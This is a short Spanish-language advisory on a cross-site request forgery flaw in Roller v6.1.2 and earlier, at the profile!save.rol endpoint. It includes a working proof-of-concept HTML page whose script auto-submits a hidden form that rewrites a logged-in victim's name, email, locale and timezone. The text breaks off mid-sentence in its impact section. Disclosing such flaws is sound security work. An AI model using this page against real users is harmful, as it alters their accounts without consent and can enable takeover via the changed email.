
Se descubrió que Roller v6.1.2 y versiones anteriores contienen una vulnerabilidad de Falsificación de Solicitudes entre Sitios (CSRF) en el endpoint /roller/roller-ui/profile!save.rol.
Esta vulnerabilidad permite a los atacantes actualizar arbitrariamente la información del perfil del usuario víctima (por ejemplo, correo electrónico, nombre completo, locale, zona horaria) mediante una página HTML manipulada.
La vulnerabilidad permite solicitudes no autorizadas a /roller/roller-ui/profile!save.rol que actualizan el perfil del usuario sin protección CSRF.
<html>
<head>
<form id="exploitForm" action="http://localhost:8080/roller/roller-ui/profile!save.rol" method="POST">
<input name="bean.userName" value="vanlam" type="hidden">
<input name="bean.screenName" value="hacked" type="hidden">
<input name="bean.fullName" value="hacked" type="hidden">
<input name="bean.emailAddress" value="[email protected]" type="hidden">
<input name="bean.passwordText" value="" type="hidden">
<input name="bean.passwordConfirm" value="" type="hidden">
<input name="bean.locale" value="vi_VN" type="hidden">
<input name="bean.timeZone" value="Asia/Bangkok" type="hidden">
</form>
<script>
document.getElementById('exploitForm').submit();
</script>
</head>
</html>
bean.userName: vanlambean.screenName: hackedbean.fullName: hackedbean.emailAddress: [email protected]bean.passwordText: (vacío)bean.passwordConfirm: (vacío)bean.locale: vi_VNbean.timeZone: Asia/BangkokUn atacante puede crear una página HTML maliciosa que, cuando la visita un usuario autenticado de Roller, enviará automáticamente un formulario para actualizar la información del perfil de la víctima sin su consentimiento. Esto puede provocar: